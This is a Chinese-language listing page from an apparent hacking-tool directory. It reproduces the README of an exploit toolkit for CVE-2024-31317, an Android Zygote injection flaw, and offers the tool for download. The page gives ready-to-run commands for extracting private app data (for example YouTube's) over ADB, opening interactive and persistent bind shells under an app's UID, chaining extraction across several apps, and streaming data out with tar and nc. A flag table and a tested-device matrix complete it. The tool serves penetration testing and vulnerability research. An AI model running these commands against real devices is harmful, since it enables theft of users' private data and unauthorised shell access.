Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
zygote-CVE-2024-31317 — 这是一个工具包,利用CVE-2024-31317通过ADB提取应用程序的私有数据,或使用应用程序的UID生成一个shell。 | Kitploit
工具/GitHubGitHub/vnescape/zygote-cve-2024-31317
Android安全漏洞分析漏洞利用数据泄露渗透测试移动安全
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

这是一个工具包,利用CVE-2024-31317通过ADB提取应用程序的私有数据,或使用应用程序的UID生成一个shell。

查看仓库
3123个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Zygote工具包 - CVE-2024-31317

这是一个利用CVE-2024-31317通过ADB提取私有应用数据或使用应用UID生成Shell的工具包。该漏洞影响安全补丁级别为2024-06-01或更低的Android 9至14版本。下方可找到已测试设备支持矩阵。

先决条件

Debian/Ubuntu(系统包)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

将 export 行添加到 ~/.bashrc(或等效文件)以持久化。

验证

root@kitploit:~
./setup.sh

快速开始

root@kitploit:~
# 构建并安装运营商APK(从源码自动构建)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# 提取应用数据目录
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app

利用程序会在首次运行时从 Hijack.java 和 AndroidManifest.xml 构建所有内容。

用法

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

模式

选项

示例

root@kitploit:~
# 提取
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube

# 检查设备是否受影响
python3 cve_2024_31317.py -d DEVICE --check-vuln

# 交互式绑定Shell
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube

# 在7777端口上持久Shell
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube

# 多应用链式提取
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"

# 仅恢复(修复启动循环)
python3 cve_2024_31317.py -d DEVICE --recover

从源码构建

所有内容均在运行时从源码构建。构建流水线使用 javac(JDK 17+)、d8、aapt、zipalign 和 Android SDK 中的 apksigner。

  • x86_64 → arm64: 工具原生运行;DEX输出与架构无关
  • ARM64 → arm64: 所有内容原生运行(Adoptium提供ARM64 JDK构建)

锁屏密码

如果设备设置了锁屏密码,则启动后处于BFU(首次解锁前)状态。利用程序会轮询 sys.user.0.ce_available 最多5分钟,直到您解锁。建议在运行利用程序期间移除锁屏密码。

已测试设备

† 三星One UI特有:ZNJECT注入成功且 -E 提取有效,但 toybox nc ServerSocket绑定Shell从未打开。需要进一步研究以找出问题的根本原因。

恢复

载荷保留在 hidden_api_blacklist_exemptions 中可能导致下次启动时发生启动循环。运行 --recover 以重置:

root@kitploit:~
python3 cve_2024_31317.py -d DEVICE --recover
下载工具
标志描述
-E通过子进程 tar | nc 提取应用数据(在父进程被杀后仍存活)
-i交互式绑定Shell REPL
-S PORT持久Shell(FIFO单端口协议)
--recover重置设置,修复启动挂起 / Zygote降级
--setup仅构建并安装运营商APK(不注入)
--list-apps列出所有已安装包及其UID和系统/用户类型
--check-vuln检查设备是否受CVE-2024-31317影响并退出
标志描述
-o file.tar提取tarball的输出路径
-y / --yes跳过确认提示
--retries N每个目标的最大重试次数(默认3)
--chain-targets "pkg1,pkg2"在单次会话中提取多个应用
--chain-file file.json同上,但从JSON文件读取
--reboot-after提取后重启(恢复Zygote)
--reboot-every N每N个链式目标后重启
--cold跳过预热;为下一次应用启动存储载荷
--port PORT绑定Shell端口(默认8888)
-d SERIAL指定特定设备(当有多个设备连接时)
--rebuild强制重建运营商APK
设备AndroidAPI补丁ABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vuln评分
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (模拟器)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12